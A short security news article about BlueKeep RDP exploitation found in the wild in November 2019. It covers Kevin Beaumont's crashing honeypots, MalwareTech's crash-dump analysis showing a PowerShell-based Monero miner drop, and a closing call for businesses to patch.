Evidence of BlueKeep's exploitation in the wild came by way of Kevin Beaumont, a security researcher who noticed multiple honeypots in his EternalPort RDP network crashing and rebooting. This struck him as unusual because it is the first time this has happened in a nearly a year and a half.
It looks like a #BlueKeep worm has finally arrived! Kevin kindly sent me a crash dump and after some investigation I found BlueKeep artifacts in memory and shellcode to drop a Monero Miner. https://t.co/7G88YAW5lr
— MalwareTech (@MalwareTechBlog) November 2, 2019
At first, Beaumont said there was no evidence of the crashing and rebooting being related to an RDP exploit. However, he sent the logs over to MalwareTech, and after digging through the crash dump, it was discovered "the BlueKeep worm has finally arrived!"
The investigation uncovered "BlueKeep artifacts in memory and shellcode to drop a Monero miner." What this appears to be doing is running an encoded PowerShell command that prompts an infected system to download a second PowerShell script, which is also encoded. The final payload is the one that looks like a cryptocurrency miner (it's detected as such by 25 antivirus engines on VirusTotal).
The ability to self-propagate (making it wormable) is what makes BlueKeep particularly worrisome. In doing so, related malware can quickly spread across a network. Microsoft has already issued a patch, and businesses are highly advised to make sure to update their systems.